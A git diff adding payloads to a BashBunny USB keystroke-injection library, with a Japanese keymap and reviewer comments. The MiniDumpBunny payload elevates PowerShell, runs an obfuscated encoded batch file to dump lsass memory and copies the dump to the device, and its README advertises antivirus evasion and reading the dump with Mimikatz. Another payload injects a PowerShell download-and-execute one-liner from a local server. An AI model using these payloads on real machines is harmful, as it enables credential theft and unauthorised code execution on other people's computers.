diff --git a/languages/jp.json b/languages/jp.json
new file mode 100644
index 00000000..9c3506fa
--- /dev/null
+++ b/languages/jp.json
@@ -0,0 +1,172 @@
+{
+ "__comment": "All numbers here are in hex format and 0x is ignored.",
+ "__comment": " ",
+ "__comment": "This list is in ascending order of 3rd byte (HID Usage ID).",
+ "__comment": " See section 10 Keyboard/Keypad Page (0x07)",
+ "__comment": " of document USB HID Usage Tables Version 1.12.",
+ "__comment": " ",
+ "__comment": "Definition of these 3 bytes can be found",
+ "__comment": " in section B.1 Protocol 1 (Keyboard)",
+ "__comment": " of document Device Class Definition for HID Version 1.11",
+ "__comment": " - byte 1: Modifier keys",
+ "__comment": " - byte 2: Reserved",
+ "__comment": " - byte 3: Keycode 1",
+ "__comment": " ",
+ "__comment": "Both documents can be obtained from link here",
+ "__comment": " http://www.usb.org/developers/hidpage/",
+ "__comment": " ",
+ "__comment": "A = LeftShift + a, { = LeftShift + [",
+ "__comment": " ",
+ "CTRL": "01,00,00",
+ "CONTROL": "01,00,00",
+ "SHIFT": "02,00,00",
+ "ALT": "04,00,00",
+ "GUI": "08,00,00",
+ "WINDOWS": "08,00,00",
+ "CTRL-ALT": "05,00,00",
+ "CTRL-SHIFT": "03,00,00",
+ "ALT-SHIFT": "06,00,00",
+ "__comment": "Below 5 key combinations are for Mac OSX",
+ "__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal",
+ "COMMAND": "08,00,00",
+ "COMMAND-CTRL": "09,00,00",
+ "COMMAND-CTRL-SHIFT": "0B,00,00",
+ "COMMAND-OPTION": "0C,00,00",
+ "COMMAND-OPTION-SHIFT": "0E,00,00",
+ "a": "00,00,04",
+ "A": "02,00,04",
+ "b": "00,00,05",
+ "B": "02,00,05",
+ "c": "00,00,06",
+ "C": "02,00,06",
+ "d": "00,00,07",
+ "D": "02,00,07",
+ "e": "00,00,08",
+ "E": "02,00,08",
+ "f": "00,00,09",
+ "F": "02,00,09",
+ "g": "00,00,0a",
+ "G": "02,00,0a",
+ "h": "00,00,0b",
+ "H": "02,00,0b",
+ "i": "00,00,0c",
+ "I": "02,00,0c",
+ "j": "00,00,0d",
+ "J": "02,00,0d",
+ "k": "00,00,0e",
+ "K": "02,00,0e",
+ "l": "00,00,0f",
+ "L": "02,00,0f",
+ "m": "00,00,10",
+ "M": "02,00,10",
+ "n": "00,00,11",
+ "N": "02,00,11",
+ "o": "00,00,12",
+ "O": "02,00,12",
+ "p": "00,00,13",
+ "P": "02,00,13",
+ "q": "00,00,14",
+ "Q": "02,00,14",
+ "r": "00,00,15",
+ "R": "02,00,15",
+ "s": "00,00,16",
+ "S": "02,00,16",
+ "t": "00,00,17",
+ "T": "02,00,17",
+ "u": "00,00,18",
+ "U": "02,00,18",
+ "v": "00,00,19",
+ "V": "02,00,19",
+ "w": "00,00,1a",
+ "W": "02,00,1a",
+ "x": "00,00,1b",
+ "X": "02,00,1b",
+ "y": "00,00,1c",
+ "Y": "02,00,1c",
+ "z": "00,00,1d",
+ "Z": "02,00,1d",
+ "1": "00,00,1e",
+ "!": "02,00,1e",
+ "2": "00,00,1f",
+ "\"": "02,00,1f",
+ "3": "00,00,20",
+ "#": "02,00,20",
+ "4": "00,00,21",
+ "$": "02,00,21",
+ "5": "00,00,22",
+ "%": "02,00,22",
+ "6": "00,00,23",
+ "&": "02,00,23",
+ "7": "00,00,24",
+ "'": "02,00,24",
+ "8": "00,00,25",
+ "(": "02,00,25",
+ "9": "00,00,26",
+ ")": "02,00,26",
+ "0": "00,00,27",
+ "ENTER": "00,00,28",
+ "ESC": "00,00,29",
+ "ESCAPE": "00,00,29",
+ "BACKSPACE": "00,00,2a",
+ "TAB": "00,00,2b",
+ "ALT-TAB": "04,00,2b",
+ "SPACE": "00,00,2c",
+ " ": "00,00,2c",
+ "-": "00,00,2d",
+ "=": "02,00,2d",
+ "^": "00,00,2e",
+ "~": "02,00,2e",
+ "@": "00,00,2f",
+ "`": "02,00,2f",
+ "[": "00,00,30",
+ "{": "02,00,30",
+ "\\": "00,00,31",
+ "|": "02,00,31",
+ "]": "00,00,32",
+ "}": "02,00,32",
+ ";": "00,00,33",
+ "+": "02,00,33",
+ ":": "00,00,34",
+ "*": "02,00,34",
+ ",": "00,00,36",
+ "<": "02,00,36",
+ ".": "00,00,37",
+ ">": "02,00,37",
+ "/": "00,00,38",
+ "?": "02,00,38",
+ "CAPSLOCK": "00,00,39",
+ "F1": "00,00,3a",
+ "F2": "00,00,3b",
+ "F3": "00,00,3c",
+ "F4": "00,00,3d",
+ "F5": "00,00,3e",
+ "F6": "00,00,3f",
+ "F7": "00,00,40",
+ "F8": "00,00,41",
+ "F9": "00,00,42",
+ "F10": "00,00,43",
+ "F11": "00,00,44",
+ "F12": "00,00,45",
+ "PRINTSCREEN":"00,00,46",
+ "SCROLLLOCK": "00,00,47",
+ "PAUSE": "00,00,48",
+ "BREAK": "00,00,48",
+ "INSERT": "00,00,49",
+ "HOME": "00,00,4a",
+ "PAGEUP": "00,00,4b",
+ "DELETE": "00,00,4c",
+ "DEL": "00,00,4c",
+ "END": "00,00,4d",
+ "PAGEDOWN": "00,00,4e",
+ "RIGHTARROW": "00,00,4f",
+ "RIGHT": "00,00,4f",
+ "LEFTARROW": "00,00,50",
+ "LEFT": "00,00,50",
+ "DOWNARROW": "00,00,51",
+ "DOWN": "00,00,51",
+ "UPARROW": "00,00,52",
+ "UP": "00,00,52",
+ "NUMLOCK": "00,00,53",
+ "MENU": "00,00,65",
+ "APP": "00,00,65"
+}
diff --git a/payloads/library/credentials/MiniDumpBunny/MiniBunny.bat b/payloads/library/credentials/MiniDumpBunny/MiniBunny.bat
new file mode 100644
index 00000000..7e6ea1d9
--- /dev/null
+++ b/payloads/library/credentials/MiniDumpBunny/MiniBunny.bat
@@ -0,0 +1,2 @@
+ÿþ&cls
+powershell.exe -enc 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
\ No newline at end of file
diff --git a/payloads/library/credentials/MiniDumpBunny/README.md b/payloads/library/credentials/MiniDumpBunny/README.md
new file mode 100644
index 00000000..a6fba8e0
--- /dev/null
+++ b/payloads/library/credentials/MiniDumpBunny/README.md
@@ -0,0 +1,17 @@
+**Title: MiniDumpBunny**
+
+Author: 0iphor13
+
+Version: 1.0
+
+What is MiniDumpBunny?
+#
+*MiniDumpBunny uses Powersploits Out-MiniDump script to dump lsass. The script was rewritten, adapted for BashBunny usage and obfuscated in multiple ways to evade Antivirus.*
+#
+
+**Instruction:**
+
+Plug in your BashBunny equipped with the obfuscated MiniBunny.bat file, wait a few seconds, go away.
+#
+Exfiltrate the .dmp file and read it with Mimikatz.
+![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/MiniDumpBunny/mimi.png)
\ No newline at end of file
diff --git a/payloads/library/credentials/MiniDumpBunny/mimi.png b/payloads/library/credentials/MiniDumpBunny/mimi.png
new file mode 100644
index 00000000..e366dd64
Binary files /dev/null and b/payloads/library/credentials/MiniDumpBunny/mimi.png differ
diff --git a/payloads/library/credentials/MiniDumpBunny/payload.txt b/payloads/library/credentials/MiniDumpBunny/payload.txt
new file mode 100644
index 00000000..2fc58a03
--- /dev/null
+++ b/payloads/library/credentials/MiniDumpBunny/payload.txt
@@ -0,0 +1,43 @@
+#!/bin/bash
+#
+# Title: MiniDumpBunny
+# Description: Dump lsass with this script, which was obfuscated with multiple layers.
+# Author: 0iphor13
+# Version: 1.0
+# Category: Credentials
+# Attackmodes: HID, Storage
+
+LED SETUP
+
+Q DELAY 500
+
+GET SWITCH_POSITION
+DUCKY_LANG de
+
+Q DELAY 500
+
+ATTACKMODE HID STORAGE
+
+#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
+
+LED STAGE1
+
+Q DELAY 1000
+RUN WIN "powershell Start-Process powershell -Verb runAs"
+Q ENTER
+Q DELAY 1000
+Q ALT j
+Q DELAY 250
+
+Q DELAY 250
+Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\MiniBunny.bat')"
+Q DELAY 250
+Q STRING " ;mv *.dmp ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
+Q DELAY 250
+Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam"
+Q DELAY 250
+Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
+Q DELAY 300
+Q ENTER
+
+LED FINISH
\ No newline at end of file
diff --git a/payloads/library/general/Win_PoSH_RandomVid/payload.txt b/payloads/library/general/Win_PoSH_RandomVid/payload.txt
new file mode 100644
index 00000000..1d2e874e
--- /dev/null
+++ b/payloads/library/general/Win_PoSH_RandomVid/payload.txt
@@ -0,0 +1,33 @@
+#!/bin/bash
+# Title: Random Video
+# Description: Downloads a list of vids from YouTube. Then pick a random one then opens it.
+# Author: Cribbit
+# Version: 1.0
+# Category: General
+# Target: Windows (Powershell 5.1+)
+# Attackmodes: RNDIS_ETHERNET HID
+
+LED SETUP
+ATTACKMODE RNDIS_ETHERNET HID
+
+GET SWITCH_POSITION
+GET HOST_IP
+
+
+cd /root/udisk/payloads/$SWITCH_POSITION/
+
+# starting server
+LED SPECIAL
+
+# disallow outgoing dns requests so server starts immediately
+iptables -A OUTPUT -p udp --dport 53 -j DROP
+python -m SimpleHTTPServer 80 &
+
+# wait until port is listening
+while ! nc -z localhost 80; do sleep 0.2; done
+
+# attack commences
+LED ATTACK
+QUACK DELAY 300
+RUN WIN "powershell -C \"iex (New-Object Net.WebClient).DownloadString('http://$HOST_IP/s')\""
+LED FINISH
\ No newline at end of file
diff --git a/payloads/library/general/Win_PoSH_RandomVid/readme.md b/payloads/library/general/Win_PoSH_RandomVid/readme.md
new file mode 100644
index 00000000..7008f5fb
--- /dev/null
+++ b/payloads/library/general/Win_PoSH_RandomVid/readme.md
@@ -0,0 +1,24 @@
+# Random Video
+- Author: Cribbit
+- Version: 1.0
+- Tested on: Windows 10 (Powershell 5.1+)
+- Category: General
+- Attackmode: HID & RNDIS_ETHERNET
+- Extensions: Run
+
+## Change Log
+| Version | Changes |
+| ------- | --------------- |
+| 1.0 | Initial release |
+
+## Description
+Downloads a list of Hak5 vids from YouTube (about 15 in the rss feed).
+
+Then pick one at random, then opens it in the browser.
+
+## Colours
+| Status | Colour | Description |
+| -------- | ----------------------------- | --------------------------- |
+| SETUP | Magenta solid | Setting attack mode |
+| ATTACK | Yellow single blink | Injecting Powershell script |
+| FINISHED | Green blink followed by SOLID | Injection finished |
\ No newline at end of file
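Review bot: The listener started by `python -m SimpleHTTPServer 80 &` and the `iptables -A OUTPUT -p udp --dport 53 -j DROP` rule are never torn down before `LED FINISH`, so every run leaves an HTTP server exporting the whole `/root/udisk/payloads/$SWITCH_POSITION/` directory (payload.txt included, not only `s`) and appends one more duplicate DROP rule to the OUTPUT chain. Record the job and reverse both once the host has had time to fetch `s`: `python -m SimpleHTTPServer 80 & SERVER_PID=$!`, then after the RUN line `kill $SERVER_PID` and `iptables -D OUTPUT -p udp --dport 53 -j DROP`. The `# disallow outgoing dns requests so server starts immediately` comment is the only one that explains a why; the reason the rule is needed (the server's reverse-lookup on start) is worth spelling out there so the next reader does not remove it as a leftover.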
diff --git a/payloads/library/general/Win_PoSH_RandomVid/s b/payloads/library/general/Win_PoSH_RandomVid/s
new file mode 100644
index 00000000..20ddb97b
--- /dev/null
+++ b/payloads/library/general/Win_PoSH_RandomVid/s
@@ -0,0 +1,24 @@
+# Get the RSS feed for the Hak5 Channel
+Write-Output "Connecting to youtube"
+$Response = Invoke-WebRequest -Uri "https://www.youtube.com/feeds/videos.xml?channel_id=UC3s0BtrBJpwNDaflRSoiieQ" -UseBasicParsing -ContentType "application/xml"
+Write-Output $Response.StatusCode
+# See if it successful
+If ($Response.StatusCode -eq "200") {
+ # set the XML
+ $Xml = [xml]$Response.Content
+ $Entries = @()
+ # Loop each entry creating an object
+ ForEach ($Entry in $Xml.feed.entry) {
+ $Entries += [PSCustomObject] @{
+ 'Updated' = [datetime]$Entry.updated
+ 'Title' = $Entry.title
+ 'Link' = $Entry.Link.href
+ }
+ }
+ # Gets a random number
+ $int = (Get-Random -Maximum ($Entries.Count -1) -Minimum 0)
+ $Entry = $Entries[$int]
+ # Opens link
+ Start-Process $Entry.Link
+ Write-Output $Entry.Title
+}
\ No newline at end of file
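Review bot: `$int = (Get-Random -Maximum ($Entries.Count -1) -Minimum 0)` can never select the last feed entry, because `-Maximum` is an exclusive upper bound; with a single entry it becomes `-Maximum 0` and with an empty feed `-Maximum -1`, and Get-Random throws for both since the minimum is not below the maximum. Use `$int = Get-Random -Minimum 0 -Maximum $Entries.Count` and guard the selection with `if ($Entries.Count -gt 0)` before indexing `$Entries[$int]`. The `-eq "200"` check on the status code is largely decorative as well: Invoke-WebRequest raises an error on non-success responses instead of returning them, so a failed request never reaches that line unless the call is wrapped in try/catch, which would be the place to report the failure the `# See if it successful` comment is aiming at.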